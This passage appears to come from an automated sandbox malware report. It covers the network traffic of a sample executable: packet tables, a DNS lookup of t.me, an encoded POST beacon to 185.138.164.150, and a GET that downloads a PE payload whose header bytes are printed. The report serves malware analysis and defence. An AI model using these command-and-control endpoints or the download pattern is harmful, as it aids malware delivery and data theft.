Sep 27, 2021 23:55:33.175815105 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.175961018 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.176460981 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.176564932 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.176599026 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.176624060 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.176654100 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.176665068 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.176700115 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.202617884 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.202672958 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.202691078 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.202718973 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.202815056 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.202884912 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.204165936 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.204209089 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.204328060 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.210304976 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.210350990 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.210463047 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.211009026 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.211177111 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.211210012 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.211235046 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.211246967 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.211292028 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.211302996 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.211378098 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.211427927 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.237616062 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.237660885 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.237708092 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.237731934 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.237823009 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.238724947 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.238754988 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.238837957 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.245851994 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.245898008 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.247351885 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.247412920 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.247417927 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.247435093 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.247457027 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.247483969 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.247509003 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.247530937 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.247612953 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.247689962 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.272685051 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.272723913 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.272764921 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.272773981 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.272798061 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.272828102 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.274336100 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.274374008 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.274652004 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.282516003 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.282548904 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.282700062 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.282988071 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.283063889 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.283266068 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.283608913 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.283648968 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.283673048 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.283679008 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.283694029 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.283714056 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.283729076 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.283736944 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.283771038 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.308195114 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.308271885 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:33.308399916 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:33.351437092 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:35.209006071 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:35.209070921 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:35.247181892 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:35.247225046 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:35.517987013 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:35.570430994 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:37.960273981 CEST	49745	80	192.168.2.3	185.138.164.150

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2021 23:55:23.647499084 CEST	57875	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:55:23.660597086 CEST	53	57875	8.8.8.8	192.168.2.3
Sep 27, 2021 23:55:39.494781971 CEST	54154	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:55:39.525029898 CEST	53	54154	8.8.8.8	192.168.2.3
Sep 27, 2021 23:55:57.043615103 CEST	52806	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:55:57.123997927 CEST	53	52806	8.8.8.8	192.168.2.3
Sep 27, 2021 23:55:57.740303040 CEST	53910	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:55:57.825221062 CEST	53	53910	8.8.8.8	192.168.2.3
Sep 27, 2021 23:55:58.354593992 CEST	64021	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:55:58.436990976 CEST	53	64021	8.8.8.8	192.168.2.3
Sep 27, 2021 23:55:58.828676939 CEST	60784	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:55:58.835969925 CEST	51143	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:55:58.841284990 CEST	53	60784	8.8.8.8	192.168.2.3
Sep 27, 2021 23:55:58.868156910 CEST	53	51143	8.8.8.8	192.168.2.3
Sep 27, 2021 23:55:59.409816027 CEST	56009	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:55:59.425090075 CEST	53	56009	8.8.8.8	192.168.2.3
Sep 27, 2021 23:55:59.818212032 CEST	59026	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:55:59.831110954 CEST	53	59026	8.8.8.8	192.168.2.3
Sep 27, 2021 23:56:00.313652039 CEST	49572	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:56:00.328525066 CEST	53	49572	8.8.8.8	192.168.2.3
Sep 27, 2021 23:56:01.259505987 CEST	60823	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:56:01.271882057 CEST	53	60823	8.8.8.8	192.168.2.3
Sep 27, 2021 23:56:02.819603920 CEST	52130	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:56:02.833303928 CEST	53	52130	8.8.8.8	192.168.2.3
Sep 27, 2021 23:56:03.613842964 CEST	55102	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:56:03.626836061 CEST	53	55102	8.8.8.8	192.168.2.3
Sep 27, 2021 23:56:07.029476881 CEST	56236	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:56:07.049738884 CEST	53	56236	8.8.8.8	192.168.2.3
Sep 27, 2021 23:56:07.323697090 CEST	56527	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:56:07.342268944 CEST	53	56527	8.8.8.8	192.168.2.3
Sep 27, 2021 23:56:08.845547915 CEST	49559	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:56:08.858745098 CEST	53	49559	8.8.8.8	192.168.2.3
Sep 27, 2021 23:56:13.022697926 CEST	52650	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:56:13.049321890 CEST	53	52650	8.8.8.8	192.168.2.3
Sep 27, 2021 23:56:15.579526901 CEST	63297	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:56:15.600047112 CEST	53	63297	8.8.8.8	192.168.2.3
Sep 27, 2021 23:56:26.114584923 CEST	58361	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:56:26.127346039 CEST	53	58361	8.8.8.8	192.168.2.3
Sep 27, 2021 23:56:40.086504936 CEST	53615	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:56:40.100507975 CEST	53	53615	8.8.8.8	192.168.2.3
Sep 27, 2021 23:56:59.318882942 CEST	50728	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:56:59.332376003 CEST	53	50728	8.8.8.8	192.168.2.3
Sep 27, 2021 23:57:23.082950115 CEST	53777	53	192.168.2.3	8.8.8.8
Sep 27, 2021 23:57:23.096355915 CEST	53	53777	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 27, 2021 23:55:23.647499084 CEST	192.168.2.3	8.8.8.8	0x57e6	Standard query (0)	t.me	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 27, 2021 23:55:23.660597086 CEST	8.8.8.8	192.168.2.3	0x57e6	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

t.me

185.138.164.150

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49744	149.154.167.99	443	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49745	185.138.164.150	80	C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe

Timestamp	kBytes transferred	Direction	Data
Sep 27, 2021 23:55:24.120461941 CEST	930	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Content-Length: 128 Host: 185.138.164.150
Sep 27, 2021 23:55:24.120522976 CEST	930	OUT	Data Raw: 6f 32 78 74 51 66 33 41 51 48 4d 49 74 4c 32 4e 77 4f 74 46 70 4a 6c 77 57 70 61 47 45 4a 62 38 36 4e 35 53 36 52 62 44 5a 4c 46 2f 57 45 77 37 69 56 4a 33 59 30 68 44 75 74 57 46 46 71 72 2b 35 50 41 2b 36 4a 34 68 42 33 2f 65 44 41 53 68 77 35 Data Ascii: o2xtQf3AQHMItL2NwOtFpJlwWpaGEJb86N5S6RbDZLF/WEw7iVJ3Y0hDutWFFqr+5PA+6J4hB3/eDAShw5I99tAthteM5WdFbCJar7tj6PxWZFldSIiUT+XAhR/Atg==
Sep 27, 2021 23:55:24.629426003 CEST	931	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Sep 2021 21:55:24 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Access-Control-Allow-Origin: * Data Raw: 66 33 37 0d 0a 75 6e 4e 32 47 4b 2b 6e 50 6d 63 50 74 4e 62 35 73 2f 55 45 79 35 35 52 4d 2b 61 63 65 74 4f 7a 38 59 4d 56 34 51 33 57 41 4f 56 4d 54 30 46 62 6e 33 38 48 62 51 59 46 36 2b 6e 68 50 73 2b 38 77 4b 56 71 32 38 78 30 5a 6d 33 48 5a 6b 53 32 6b 49 68 75 39 6f 4e 39 30 59 53 4e 37 47 42 4a 4f 69 67 49 72 37 34 30 75 66 70 57 4f 51 49 4c 47 59 6d 57 58 72 4b 62 32 31 36 61 75 38 46 59 55 66 33 32 46 2b 6f 65 34 62 31 32 34 76 62 4c 37 58 61 79 44 53 66 6b 67 53 6f 2b 47 38 34 68 72 4f 59 79 74 4f 35 4a 4e 30 42 74 59 4f 54 5a 78 7a 5a 70 32 6c 64 70 53 4f 64 31 63 39 34 56 4e 35 5a 78 47 38 6c 68 4d 49 78 57 33 6a 31 6e 35 64 39 79 68 32 56 34 48 6f 4e 2f 4e 2b 68 34 61 34 6a 54 34 7a 6d 61 68 53 59 56 37 44 6e 73 73 68 55 6b 64 31 79 4b 5a 31 48 6a 49 48 56 34 50 48 79 37 38 34 48 59 71 6f 73 78 45 7a 6c 35 55 74 42 63 32 6b 33 62 35 67 61 4b 5a 30 44 49 61 71 4f 50 32 58 63 4f 64 5a 6b 6f 63 45 77 53 62 69 43 4b 38 79 62 71 36 76 45 61 79 4a 34 5a 4f 41 30 54 2b 42 6f 51 37 6e 38 6a 6a 7a 59 4a 78 42 46 4e 46 51 76 6a 61 73 73 57 58 4f 49 72 55 6b 69 39 70 7a 2b 61 38 42 41 74 79 35 41 52 2b 77 6b 33 65 57 31 33 77 30 44 59 79 31 31 6b 34 33 6a 4e 69 38 65 70 4e 36 39 52 54 5a 54 70 56 7a 49 74 74 31 55 57 55 70 75 37 57 39 65 54 7a 79 39 36 4a 47 41 59 74 30 4d 79 44 38 6c 75 49 49 49 43 54 6f 39 69 4f 65 4f 6b 39 59 35 62 6a 43 2b 68 79 49 79 64 64 44 70 62 6a 44 71 4f 33 39 37 46 7a 45 73 67 5a 65 4c 46 34 65 32 54 6f 64 6f 54 79 30 6d 49 52 76 48 63 62 69 4e 70 71 71 54 50 4c 57 54 53 4b 67 56 64 32 72 66 79 7a 74 79 50 41 34 50 39 47 35 4a 55 47 76 48 47 77 49 47 44 33 58 65 46 4a 35 52 58 33 55 7a 74 49 74 62 45 76 2b 77 35 30 69 34 32 47 33 62 47 72 48 35 34 72 35 6a 74 45 68 68 73 76 54 33 77 62 42 35 32 2b 55 72 66 78 57 73 51 66 44 34 6c 31 63 51 78 76 50 55 69 56 36 69 4d 6d 48 36 68 6c 52 4f 46 6f 71 78 4d 79 35 4d 62 35 48 37 66 41 50 70 42 48 59 49 71 61 57 49 4e 57 50 46 55 76 38 5a 6f 7a 57 58 71 41 31 47 59 6b 32 69 2b 2b 38 67 44 58 36 68 32 31 46 41 2b 38 6b 61 32 6b 42 77 31 59 64 53 4c 4e 72 70 4f 6c 55 71 6b 55 56 73 50 44 6c 41 46 69 69 74 53 2b 38 52 75 70 6a 5a 48 5a 53 72 73 74 6e 44 32 4c 7a 38 72 70 65 34 71 48 64 69 45 64 65 4d 54 38 57 42 2f 65 78 55 49 62 33 30 48 42 46 44 6a 76 68 71 53 61 64 64 57 36 75 4f 6a 4d 63 45 72 58 2f 38 30 35 33 68 71 71 65 4b 33 70 46 54 51 38 6b 79 5a 66 6e 4d 2f 63 6a 66 69 4c 78 31 4f 6a 43 35 2b 38 6f 53 78 37 53 46 2b 58 56 43 48 4f 4e 56 77 30 75 75 64 49 35 42 33 61 31 62 71 64 67 6a 59 57 76 4e 38 2f 32 4b 70 48 36 6c 41 33 36 48 4e 79 2b 50 49 74 45 54 5a 71 74 6a 2b 6f 44 59 55 38 73 63 68 75 6d 65 6e 6d 51 59 78 66 70 43 78 61 45 59 32 70 75 6e 56 31 65 45 7a 2b 57 73 6e 78 56 58 58 36 48 43 4f 31 57 33 48 31 6d 47 48 6e 43 48 4c 39 55 69 30 4a 39 71 72 32 58 6e 78 51 59 6b 46 33 71 4f 42 68 58 33 6e 4a 65 4a 48 48 41 74 64 49 49 49 75 2f 4f 69 4e 49 31 30 73 66 50 77 52 70 4c 7a 47 5a 64 67 34 72 52 30 65 78 41 4b 50 78 37 43 33 46 4e 41 62 78 35 65 2f 41 6e 38 31 54 43 6a 58 71 75 34 63 67 6b 75 4a 73 74 71 4e 55 43 43 46 6a 48 77 67 7a 50 4c 33 42 51 68 54 48 4e 4a 64 54 4e 55 51 71 4a 44 4f 4a 34 32 5a 71 63 45 6c 7a 4c 36 6a 38 73 53 37 6d 64 66 45 33 39 76 46 33 48 63 64 33 76 68 79 74 66 4e 4a 35 71 58 50 51 46 44 61 74 42 53 34 30 68 53 4c 75 79 53 52 32 32 73 37 33 75 35 38 4a 58 55 66 4b 55 66 7a 47 2b 74 Data Ascii: f37unN2GK+nPmcPtNb5s/UEy55RM+acetOz8YMV4Q3WAOVMT0Fbn38HbQYF6+nhPs+8wKVq28x0Zm3HZkS2kIhu9oN90YSN7GBJOigIr740ufpWOQILGYmWXrKb216au8FYUf32F+oe4b124vbL7XayDSfkgSo+G84hrOYytO5JN0BtYOTZxzZp2ldpSOd1c94VN5ZxG8lhMIxW3j1n5d9yh2V4HoN/N+h4a4jT4zmahSYV7DnsshUkd1yKZ1HjIHV4PHy784HYqosxEzl5UtBc2k3b5gaKZ0DIaqOP2XcOdZkocEwSbiCK8ybq6vEayJ4ZOA0T+BoQ7n8jjzYJxBFNFQvjassWXOIrUki9pz+a8BAty5AR+wk3eW13w0DYy11k43jNi8epN69RTZTpVzItt1UWUpu7W9eTzy96JGAYt0MyD8luIIICTo9iOeOk9Y5bjC+hyIyddDpbjDqO397FzEsgZeLF4e2TodoTy0mIRvHcbiNpqqTPLWTSKgVd2rfyztyPA4P9G5JUGvHGwIGD3XeFJ5RX3UztItbEv+w50i42G3bGrH54r5jtEhhsvT3wbB52+UrfxWsQfD4l1cQxvPUiV6iMmH6hlROFoqxMy5Mb5H7fAPpBHYIqaWINWPFUv8ZozWXqA1GYk2i++8gDX6h21FA+8ka2kBw1YdSLNrpOlUqkUVsPDlAFiitS+8RupjZHZSrstnD2Lz8rpe4qHdiEdeMT8WB/exUIb30HBFDjvhqSaddW6uOjMcErX/8053hqqeK3pFTQ8kyZfnM/cjfiLx1OjC5+8oSx7SF+XVCHONVw0uudI5B3a1bqdgjYWvN8/2KpH6lA36HNy+PItETZqtj+oDYU8schumenmQYxfpCxaEY2punV1eEz+WsnxVXX6HCO1W3H1mGHnCHL9Ui0J9qr2XnxQYkF3qOBhX3nJeJHHAtdIIIu/OiNI10sfPwRpLzGZdg4rR0exAKPx7C3FNAbx5e/An81TCjXqu4cgkuJstqNUCCFjHwgzPL3BQhTHNJdTNUQqJDOJ42ZqcElzL6j8sS7mdfE39vF3Hcd3vhytfNJ5qXPQFDatBS40hSLuySR22s73u58JXUfKUfzG+t
Sep 27, 2021 23:55:24.629452944 CEST	933	IN	Data Raw: 79 34 4c 5a 75 54 68 30 51 57 4a 59 5a 63 58 4c 63 33 4c 32 76 50 6d 5a 69 7a 56 4e 75 34 70 57 36 2f 50 38 35 63 65 65 45 32 6c 37 32 4f 6c 76 76 41 36 70 58 43 45 68 57 64 64 70 52 30 5a 62 37 63 51 73 7a 58 64 7a 4e 66 37 6f 76 56 70 65 64 46 Data Ascii: y4LZuTh0QWJYZcXLc3L2vPmZizVNu4pW6/P85ceeE2l72OlvvA6pXCEhWddpR0Zb7cQszXdzNf7ovVpedFPrGOCQ4MIytnD1JJFFw5VEbyMAfklq9okQ2AIGXFoaMexhI+WUFk3vc6eynUbihL/nT5eTuvF/gNGZh0xpQKan7ixIVzTF6Vkdbb7pt5tujjlP9CLfx1vTHwCT4BaIh/s9rZf+Mv5Fd3rAl32r3uiApYcHJjD4LNn
Sep 27, 2021 23:55:24.629466057 CEST	934	IN	Data Raw: 37 65 4f 38 72 44 2f 4e 35 67 52 5a 32 2b 77 58 77 72 2f 44 6a 57 55 35 77 75 46 7a 64 4a 30 73 52 66 4d 31 35 65 50 74 4e 31 67 6c 67 79 35 5a 76 6e 30 65 6a 56 4c 71 37 54 37 51 6b 65 4c 30 74 47 73 47 68 71 34 67 46 76 6a 43 56 78 61 79 30 49 Data Ascii: 7eO8rD/N5gRZ2+wXwr/DjWU5wuFzdJ0sRfM15ePtN1glgy5Zvn0ejVLq7T7QkeL0tGsGhq4gFvjCVxay0IbdBahbc6O95x29yRM/T87VDLnUabb7+Cl8BTvF1tLmDq07PG1MiflARsl3s1frWVh/kLYJN31ByHtEL0S0ffZmAccG1P0FL1bBpbl9FLywjoScydO4PcugqiTTkII8EO99Q00eR11xUy43kLIiPqQ1QdwrPQ3M7yb
Sep 27, 2021 23:55:24.629476070 CEST	934	IN	Data Raw: 2b 45 31 37 44 56 4c 4b 45 56 74 4b 68 34 35 4c 36 57 73 4d 74 70 6f 4a 66 45 4c 69 76 4f 45 68 4c 53 53 79 2b 41 51 2b 30 6b 73 74 32 57 68 59 75 72 58 41 51 2f 49 75 41 7a 34 68 4a 4c 52 31 6f 70 50 59 78 49 30 5a 6f 52 4c 30 2f 48 39 47 4b 4a Data Ascii: +E17DVLKEVtKh45L6WsMtpoJfELivOEhLSSy+AQ+0kst2WhYurXAQ/IuAz4hJLR1opPYxI0ZoRL0/H9GKJTYHqqAFCDeBvmugYmWF/UZ
Sep 27, 2021 23:55:24.629508018 CEST	936	IN	Data Raw: 37 65 31 0d 0a 78 45 61 65 70 44 4c 41 73 58 41 6d 73 41 4a 6d 67 36 35 76 31 77 67 75 33 4d 38 44 35 75 72 62 34 57 51 69 61 37 4f 79 31 50 71 34 6a 4b 2b 55 65 73 67 50 2b 37 6d 4c 42 4c 6d 35 48 36 4b 67 36 79 64 62 30 66 44 36 69 74 65 6c 63 Data Ascii: 7e1xEaepDLAsXAmsAJmg65v1wgu3M8D5urb4WQia7Oy1Pq4jK+UesgP+7mLBLm5H6Kg6ydb0fD6itelcvF5nWVfBHjQPVC4pR9L6ysv8swKGjx7yiV2HHqf8K1YGIZd096vCOsR/JZlVX407EWM/mDjMUUV0nv1auCOyo15nUt0hl38NxAJ/2i/TmRQkHbIXYxylq/rU2b0PgGMuKp8eeyzGNiWlzWP0ObXhxTqhx3GG120Kp
Sep 27, 2021 23:55:24.629730940 CEST	936	IN	Data Raw: 6e 74 7a 5a 31 32 33 30 77 43 39 72 58 4d 42 63 66 78 59 35 58 47 77 63 38 76 64 78 5a 36 2b 42 57 4c 77 58 30 4a 6d 70 55 50 61 50 4c 75 52 6b 6e 52 54 42 58 57 72 4d 30 4f 30 79 57 4d 6d 4d 69 7a 41 51 65 56 42 56 72 64 30 63 46 38 6b 56 6f 2b Data Ascii: ntzZ1230wC9rXMBcfxY5XGwc8vdxZ6+BWLwX0JmpUPaPLuRknRTBXWrM0O0yWMmMizAQeVBVrd0cF8kVo+lLBLFUrcYzGH6JyzwaeyKZ3zT5SoNCUeEVPtjsqLr3XAQE3Y4ChpZCtSVhfdPkzShQ68+7UiY3wcn+CmZV29nvatz4VEjgt2XTPYo9qR19lITIeszJ4Cl31EGeq/DxzeUaJi/bZluc8Q3L99Q01Z48iIhAjG4UDW+
Sep 27, 2021 23:55:24.661581993 CEST	937	OUT	GET //l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 185.138.164.150
Sep 27, 2021 23:55:24.899183035 CEST	938	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Sep 2021 21:55:24 GMT Content-Type: application/octet-stream Content-Length: 916735 Connection: keep-alive Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT ETag: "612fa893-dfcff" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 